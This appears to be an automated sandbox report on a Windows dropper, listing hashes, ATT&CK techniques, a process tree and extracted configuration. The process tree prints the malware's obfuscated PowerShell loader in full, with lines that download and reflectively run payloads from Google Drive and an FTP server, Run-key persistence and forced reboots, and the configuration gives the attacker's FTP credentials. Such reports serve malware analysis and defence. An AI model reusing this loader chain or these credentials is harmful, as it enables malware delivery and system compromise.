e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711

General

Target

e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
Size

504KB
MD5

8b7ed745bf0d5f0eaa43940d9cdeab37
SHA1

2916a90ce784cc380c03828dc5a15907d490be42
SHA256

e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711
SHA512

c731b0688ad792e4448ce6bd882a288757a949fd1cf645a6d93b36d1a1a4689f6e7f843edb1660bf0a63774ee795e054e4d443655f7144ac4a3fa35ad1737df3
SSDEEP

12288:TLMEalqxXblqoRX5qbfphLxaOdRSRW4H4444Cbm:HqaXNabfphLxaSRSRW4H4444Cbm

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
19	2124	powershell.exe
23	2124	powershell.exe
25	2124	powershell.exe
27	2124	powershell.exe
31	2124	powershell.exe
32	2124	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_g = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\cgipt.ps1' \";exit"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2124	powershell.exe
4444	powershell.exe
3256	powershell.exe
4460	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Dados dos hospedes.vbs	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
File opened for modification	C:\Program Files\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Program Files\__tmp_rar_sfx_access_check_240621562	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
File created	C:\Program Files\Dados dos hospedes.vbs	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Local Settings	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4444	powershell.exe
4444	powershell.exe
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
3256	powershell.exe
3256	powershell.exe
4460	powershell.exe
4460	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1104 wrote to memory of 3068	1104	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe	84
PID 1104 wrote to memory of 3068	1104	e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe	84
PID 3068 wrote to memory of 4444	3068	WScript.exe	86
PID 3068 wrote to memory of 4444	3068	WScript.exe	86
PID 4444 wrote to memory of 2124	4444	powershell.exe	88
PID 4444 wrote to memory of 2124	4444	powershell.exe	88
PID 2124 wrote to memory of 2724	2124	powershell.exe	97
PID 2124 wrote to memory of 2724	2124	powershell.exe	97
PID 2124 wrote to memory of 3256	2124	powershell.exe	98
PID 2124 wrote to memory of 3256	2124	powershell.exe	98
PID 2124 wrote to memory of 4460	2124	powershell.exe	100
PID 2124 wrote to memory of 4460	2124	powershell.exe	100
PID 2124 wrote to memory of 608	2124	powershell.exe	101
PID 2124 wrote to memory of 608	2124	powershell.exe	101

C:\Users\Admin\AppData\Local\Temp\e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe
"C:\Users\Admin\AppData\Local\Temp\e1e3a3d82a5705bb3fb54b66b71ecb831292a0df6840b215a999cd960f297711.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1104
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Program Files\Dados dos hospedes.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$IvwMW = 'OwB9四いуDs四いуKQ四いуg四いуCk四いуI四いу四いуn四いуDE四いуZQB1四いуHI四いуd四いу四いуn四いуC四いу四いуL四いу四いуg四いуGU四いуagB3四いуHo四いуa四いу四いуk四いуC四いу四いуL四いу四いуg四いуCc四いуa四いуB0四いуHQ四いуc四いуBz四いуDo四いуLw四いуv四いуH四いу四いуYQBz四いуHQ四いуYgBp四いуG4四いуLgBu四いуGU四いуd四いу四いуv四いуHI四いуYQB3四いуC8四いуMw四いуx四いуD四いу四いуO四いу四いуy四いуDQ四いуLQ四いу1四いуD四いу四いуNg四いуn四いуC四いу四いуK四いу四いуg四いуF0四いуXQBb四いуHQ四いуYwBl四いуGo四いуYgBv四いуFs四いуI四いу四いуs四いуC四いу四いуb四いуBs四いуHU四いуbg四いуk四いуC四いу四いуK四いуBl四いуGs四いуbwB2四いуG4四いуSQ四いуu四いуCk四いуI四いу四いуn四いуEk四いуVgBG四いуHI四いуc四いу四いуn四いуC四いу四いуK四いуBk四いуG8四いуa四いуB0四いуGU四いуTQB0四いуGU四いуRw四いуu四いуCk四いуJw四いуx四いуHM四いуcwBh四いуGw四いуQw四いуu四いуDM四いуeQBy四いуGE四いуcgBi四いуGk四いуT四いуBz四いуHM四いуYQBs四いуEM四いуJw四いуo四いуGU四いуc四いуB5四いуFQ四いуd四いуBl四いуEc四いуLg四いуp四いуC四いу四いуSQBv四いуH四いу四いуbQBQ四いуCQ四いуI四いу四いуo四いуGQ四いуYQBv四いуEw四いуLgBu四いуGk四いуYQBt四いуG8四いуR四いуB0四いуG4四いуZQBy四いуHI四いуdQBD四いуDo四いуOgBd四いуG4四いуaQBh四いуG0四いуbwBE四いуH四いу四いуc四いуBB四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWw四いу7四いуCk四いуI四いу四いуp四いуC四いу四いуJwBB四いуCc四いуI四いу四いуs四いуC四いу四いуJwCTITo四いуkyEn四いуC四いу四いуK四いуBl四いуGM四いуYQBs四いуH四いу四いуZQBS四いуC4四いуZwBT四いуHo四いуQwBC四いуGw四いуJ四いу四いуg四いуCg四いуZwBu四いуGk四いуcgB0四いуFM四いуN四いу四いу2四いуGU四いуcwBh四いуEI四いуbQBv四いуHI四いуRg四いу6四いуDo四いуXQB0四いуHI四いуZQB2四いуG4四いуbwBD四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWw四いуg四いуD0四いуI四いуBJ四いуG8四いуc四いуBt四いуF四いу四いуJ四いу四いуg四いуF0四いуXQBb四いуGU四いуd四いуB5四いуEI四いуWw四いу7四いуCc四いуJQBJ四いуGg四いуcQBS四いуFg四いуJQ四いуn四いуC四いу四いуPQ四いуg四いуGU四いуagB3四いуHo四いуa四いу四いуk四いуDs四いуKQ四いуg四いуGc四いуUwB6四いуEM四いуQgBs四いуCQ四いуI四いу四いуo四いуGc四いуbgBp四いуHI四いуd四いуBT四いуGQ四いуYQBv四いуGw四いуbgB3四いуG8四いуR四いу四いуu四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуC四いу四いуPQ四いуg四いуGc四いуUwB6四いуEM四いуQgBs四いуCQ四いуOw四いу4四いуEY四いуV四いуBV四いуDo四いуOgBd四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуHQ四いуe四いуBl四いуFQ四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуKQB0四いуG4四いуZQBp四いуGw四いуQwBi四いуGU四いуVw四いуu四いуHQ四いуZQBO四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуE8四いуLQB3四いуGU四いуTg四いуo四いуC四いу四いуPQ四いуg四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуKQ四いуo四いуGU四いуcwBv四いуH四いу四いуcwBp四いуGQ四いуLgBB四いуHY四いуSgBT四いуEk四いуJ四いу四いу7四いуCk四いуI四いу四いуn四いуHQ四いуe四いуB0四いуC4四いуMQ四いуw四いуEw四いуT四いуBE四いуC8四いуMQ四いуw四いуC8四いуcgBl四いуHQ四いуc四いуB5四いуHI四いуYwBw四いуFU四いуLwBy四いуGI四いуLgBt四いуG8四いуYw四いуu四いуHQ四いуYQBy四いуGI四いуdgBr四いуGM四いуcwBl四いуGQ四いуLgBw四いуHQ四いуZgB四いу四いуDE四いуd四いуBh四いуHI四いуYgB2四いуGs四いуYwBz四いуGU四いуZ四いу四いуv四いуC8四いуOgBw四いуHQ四いуZg四いуn四いуC四いу四いуK四いуBn四いуG4四いуaQBy四いуHQ四いуUwBk四いуGE四いуbwBs四いуG4四いуdwBv四いуEQ四いуLgBB四いуHY四いуSgBT四いуEk四いуJ四いу四いуg四いуD0四いуI四いуBn四いуFM四いуegBD四いуEI四いуb四いу四いуk四いуDs四いуKQ四いуn四いуE四いу四いуQ四いуBw四いуEo四いуO四いу四いу3四いуDU四いуMQ四いуy四いуG8四いуcgBw四いуHI四いуZQBw四いуG8四いуb四いуBl四いуHY四いуZQBk四いуCc四いуL四いу四いуn四いуDE四いуd四いуBh四いуHI四いуYgB2四いуGs四いуYwBz四いуGU四いуZ四いу四いуn四いуCg四いуb四いуBh四いуGk四いуd四いуBu四いуGU四いуZ四いуBl四いуHI四いуQwBr四いуHI四いуbwB3四いуHQ四いуZQBO四いуC4四いуd四いуBl四いуE4四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUw四いуg四いуHQ四いуYwBl四いуGo四いуYgBv四いуC0四いуdwBl四いуG4四いуI四いу四いу9四いуC四いу四いуcwBs四いуGE四いуaQB0四いуG4四いуZQBk四いуGU四いуcgBD四いуC4四いуQQB2四いуEo四いуUwBJ四いуCQ四いуOw四いу4四いуEY四いуV四いуBV四いуDo四いуOgBd四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуHQ四いуe四いуBl四いуFQ四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуKQB0四いуG4四いуZQBp四いуGw四いуQwBi四いуGU四いуVw四いуu四いуHQ四いуZQBO四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуE8四いуLQB3四いуGU四いуTg四いуo四いуC四いу四いуPQ四いуg四いуEE四いуdgBK四いуFM四いуSQ四いуk四いуDs四いуZwBT四いуHo四いуQwBC四いуGw四いуJ四いу四いу7四いуDI四いуMQBz四いуGw四いуV四いу四いу6四いуDo四いуXQBl四いуH四いу四いуeQBU四いуGw四いуbwBj四いуG8四いуd四いуBv四いуHI四いуU四いуB5四いуHQ四いуaQBy四いуHU四いуYwBl四いуFM四いуLgB0四いуGU四いуTg四いуu四いуG0四いуZQB0四いуHM四いуeQBT四いуFs四いуI四いу四いу9四いуC四いу四いуb四いуBv四いуGM四いуbwB0四いуG8四いуcgBQ四いуHk四いуd四いуBp四いуHI四いуdQBj四いуGU四いуUw四いу6四いуDo四いуXQBy四いуGU四いуZwBh四いуG4四いуYQBN四いуHQ四いуbgBp四いуG8四いуU四いуBl四いуGM四いуaQB2四いуHI四いуZQBT四いуC4四いуd四いуBl四いуE4四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуDs四いуfQBl四いуHU四いуcgB0四いуCQ四いуew四いуg四いуD0四いуI四いуBr四いуGM四いуYQBi四いуGw四いуb四いуBh四いуEM四いуbgBv四いуGk四いуd四いуBh四いуGQ四いуaQBs四いуGE四いуVgBl四いуHQ四いуYQBj四いуGk四いуZgBp四いуHQ四いуcgBl四いуEM四いуcgBl四いуHY四いуcgBl四いуFM四いуOg四いу6四いуF0四いуcgBl四いуGc四いуYQBu四いуGE四いуTQB0四いуG4四いуaQBv四いуF四いу四いуZQBj四いуGk四いуdgBy四いуGU四いуUw四いуu四いуHQ四いуZQBO四いуC4四いуbQBl四いуHQ四いуcwB5四いуFM四いуWwB7四いуC四いу四いуZQBz四いуGw四いуZQB9四いуC四いу四いуZg四いуv四いуC四いу四いуM四いу四いуg四いуHQ四いуLw四いуg四いуHI四いуLw四いуg四いуGU四いуe四いуBl四いуC4四いуbgB3四いуG8四いуZ四いуB0四いуHU四いуa四いуBz四いуC四いу四いуOw四いуn四いуD四いу四いуO四いу四いуx四いуC四いу四いуc四いуBl四いуGU四いуb四いуBz四いуCc四いуI四いуBk四いуG4四いуYQBt四いуG0四いуbwBj四いуC0四いуI四いуBl四いуHg四いуZQ四いуu四いуGw四いуb四いуBl四いуGg四いуcwBy四いуGU四いуdwBv四いуH四いу四いуOw四いуg四いуGU四いуYwBy四いуG8四いуZg四いуt四いуC四いу四いуKQ四いуg四いуCc四いуc四いуB1四いуHQ四いуcgBh四いуHQ四いуUwBc四いуHM四いуbQBh四いуHI四いуZwBv四いуHI四いуU四いуBc四いуHU四いуbgBl四いуE0四いуI四いуB0四いуHI四いуYQB0四いуFM四いуX四いуBz四いуHc四いуbwBk四いуG4四いуaQBX四いуFw四いуd四いуBm四いуG8四いуcwBv四いуHI四いуYwBp四いуE0四いуX四いуBn四いуG4四いуaQBt四いуGE四いуbwBS四いуFw四いуYQB0四いуGE四いуR四いуBw四いуH四いу四いуQQBc四いуCc四いуI四いу四いуr四いуC四いу四いуRgBH四いуHI四いуVQBB四いуCQ四いуI四いу四いуo四いуC四いу四いуbgBv四いуGk四いуd四いуBh四いуG4四いуaQB0四いуHM四いуZQBE四いуC0四いуI四いу四いуn四いуCU四いуSQBo四いуHE四いуUgBY四いуCU四いуJw四いуg四いуG0四いуZQB0四いуEk四いуLQB5四いуH四いу四いуbwBD四いуC四いу四いуOw四いуg四いуHQ四いуcgBh四いуHQ四いуcwBl四いуHI四いуbwBu四いуC8四いуI四いуB0四いуGU四いуaQB1四いуHE四いуLw四いуg四いуFE四いуQQBq四いуHo四いуSQ四いуg四いуGU四いуe四いуBl四いуC4四いуYQBz四いуHU四いуdw四いуg四いуGU四いуe四いуBl四いуC4四いуb四いуBs四いуGU四いуa四いуBz四いуHI四いуZQB3四いуG8四いуc四いу四いуg四いуDs四いуKQ四いуn四いуHU四いуcwBt四いуC4四いуbgBp四いуHc四いуc四いуBV四いуFw四いуJw四いуg四いуCs四いуI四いуBw四いуGo四いуT四いуBq四いуE0四いуJ四いу四いуo四いуC四いу四いуPQ四いуg四いуFE四いуQQBq四いуHo四いуSQ四いу7四いуCk四いуI四いуBl四いуG0四いуYQBO四いуHI四いуZQBz四いуFU四いуOg四いу6四いуF0四いуd四いуBu四いуGU四いуbQBu四いуG8四いуcgBp四いуHY四いуbgBF四いуFs四いуI四いу四いуr四いуC四いу四いуJwBc四いуHM四いуcgBl四いуHM四いуVQBc四いуDo四いуQw四いуn四いуCg四いуI四いу四いу9四いуC四いу四いуRgBH四いуHI四いуVQBB四いуCQ四いуOw四いуp四いуCc四いуdQBz四いуG0四いуLgBu四いуGk四いуdwBw四いуFU四いуX四いу四いуn四いуC四いу四いуKw四いуg四いуH四いу四いуagBM四いуGo四いуTQ四いуk四いуC四いу四いуL四いуBC四いуEs四いуT四いуBS四いуFU四いуJ四いу四いуo四いуGU四いуb四いуBp四いуEY四いуZ四いуBh四いуG8四いуb四いуBu四いуHc四いуbwBE四いуC4四いуSQBl四いуHk四いуVgBt四いуCQ四いуOw四いу4四いуEY四いуV四いуBV四いуDo四いуOgBd四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуHQ四いуe四いуBl四いуFQ四いуLgBt四いуGU四いуd四いуBz四いуHk四いуUwBb四いуC四いу四いуPQ四いуg四いуGc四いуbgBp四いуGQ四いуbwBj四いуG4四いуRQ四いуu四いуEk四いуZQB5四いуFY四いуbQ四いуk四いуDs四いуKQB0四いуG4四いуZQBp四いуGw四いуQwBi四いуGU四いуVw四いуu四いуHQ四いуZQBO四いуC四いу四いуd四いуBj四いуGU四いуagBi四いуE8四いуLQB3四いуGU四いуTg四いуo四いуC四いу四いуPQ四いуg四いуEk四いуZQB5四いуFY四いуbQ四いуk四いуDs四いуfQ四いу7四いуC四いу四いуKQ四いуn四いуHQ四いуTwBM四いуGM四いуXwBL四いуGE四いуMwBa四いуGY四いуbwBY四いуDI四いуSgBK四いуHI四いуVgBo四いуG0四いуVg四いу5四いуGM四いуbQ四いу5四いуFg四いуcwB1四いуFg四いуbQBq四いуDE四いуZw四いуx四いуCc四いуI四いу四いуr四いуC四いу四いуU四いуBw四いуFY四いуaQBz四いуCQ四いуK四いу四いуg四いуD0四いуI四いуBQ四いуH四いу四いуVgBp四いуHM四いуJ四いуB7四いуC四いу四いуZQBz四いуGw四いуZQB9四いуDs四いуI四いу四いуp四いуCc四いуMg四いу0四いуHU四いуW四いуBK四いуFQ四いуcQBh四いуG0四いуZwB5四いуE0四いуd四いуBG四いуHo四いуYQBr四いуF四いу四いуUg四いуx四いуHE四いуXwBJ四いуHY四いуRwBp四いуFg四いуTgBk四いуHE四いуYQBO四いуDE四いуJw四いуg四いуCs四いуI四いуBQ四いуH四いу四いуVgBp四いуHM四いуJ四いуAoACAAPQAgAFAAcABWAGkAcwAkAHsAIAApACAASgBpAHAAWABxACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABKAGkAcABYAHEAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAIABlAHAAcQBVAGgAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABlAHAAcQBVAGgAJAAgADsA';$rTgKn = $IvwMW.replace('四いу' , 'A') ;$wppON = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $rTgKn ) ); $wppON = $wppON[-1..-$wppON.Length] -join '';$wppON = $wppON.replace('%XRqhI%','C:\Program Files\Dados dos hospedes.vbs');powershell $wppON
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $hUqpe = $host.Version.Major.Equals(2) ;if ( $hUqpe ) {$MjLjp = [System.IO.Path]::GetTempPath();del ($MjLjp + '\Upwin.msu');$siVpP = 'https://drive.google.com/uc?export=download&id=';$qXpiJ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qXpiJ ) {$siVpP = ($siVpP + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$siVpP = ($siVpP + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mVyeI = (New-Object Net.WebClient);$mVyeI.Encoding = [System.Text.Encoding]::UTF8;$mVyeI.DownloadFile($URLKB, $MjLjp + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MjLjp + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Program Files\Dados dos hospedes.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$ISJvA = (New-Object Net.WebClient);$ISJvA.Encoding = [System.Text.Encoding]::UTF8;$ISJvA.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$lBCzSg = $ISJvA.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$ISJvA.dispose();$ISJvA = (New-Object Net.WebClient);$ISJvA.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $ISJvA.DownloadString( $lBCzSg );$hzwje = 'C:\Program Files\Dados dos hospedes.vbs';[Byte[]] $PmpoI = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $PmpoI ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '605-428013/war/ten.nibtsap//:sptth' , $hzwje , 'true1' ) );};"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2124
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
        5⤵
        
        PID:2724
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
        5⤵
        Adds Run key to start application
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3256
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\cgipt.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c del "C:\Program Files\Dados dos hospedes.vbs"
        5⤵
        
        PID:608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

1

T1070

File Deletion

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Dados dos hospedes.vbs

Filesize
681KB

MD5
91f673cf4f5d5b787e55304a8618a6c8

SHA1
d5c1ab75ac7b7faed860caba7df5f0cad998ef28

SHA256
c376a309893167d768244df15d8c01b335182f7d3c806d5373c4bd09367e9156

SHA512
3d0a872108ee86c2bf3dd394712b1449cdd635df369300bb80650fbfd13bf8f423c84a3a8fdbae2e6bc6cb46475bd6f8144703da85648c740bb2d0da5c548e1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\cgipt.ps1

Filesize
68KB

MD5
2c092401b1ad2ad4402aa7adb0eb31ad

SHA1
68f5a930c4579e7171c68cca3707770d3103f908

SHA256
8d44d29ce8f263354284bf87a02a8627f83d80d873ee683112c608ad0798b792

SHA512
7af45474c361987a82b7853ea7e7fe031a96575270f93606e6699226a03a9536b9163f5de2312a2dc1279722137b439897e5ecba68eb713ed43761bdebeb5bda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
334B

MD5
59f7a4de18193a24df3317a860584f28

SHA1
3d395c359b6720346eec79cea5e07660b18cba32

SHA256
f0fa9228d055cc6de729bb98abdb976a00c9afb36ee29f05f812ce77c25b9ea7

SHA512
3eb4e560a5648f84386bd7e54b627683dbc55236a8bc6f7d82ae4d04ba37888dfe3a10cd82a1cd071674779db2c903c85972c35bc506d9181316ed7838097988

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9697a5a3cd6d8854256cefff3c85c1fc

SHA1
18b52029716a13f640e72bfcb163b134908cc4b0

SHA256
d4f069590a9411bfe6c111355d2a40c90045b1774264cc14a39239d0067579bc

SHA512
f4b6173f2652dd3dd88ff56e27a16aa5b54bd256e8e95462a68c40bc3691a0c1019f99fad6ff32f1689e25867b361951ecb50270cb732874c956ed8d2d434238

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
721991167161c45d61b03e4dbad4984b

SHA1
fd3fa85d142b5e8d4906d3e5bfe10c5347958457

SHA256
0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb

SHA512
f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ahoywe3b.y0x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2124-24-0x0000015B70E10000-0x0000015B70E1A000-memory.dmp

Filesize
40KB

Download
memory/4444-10-0x000001D1A5130000-0x000001D1A5152000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads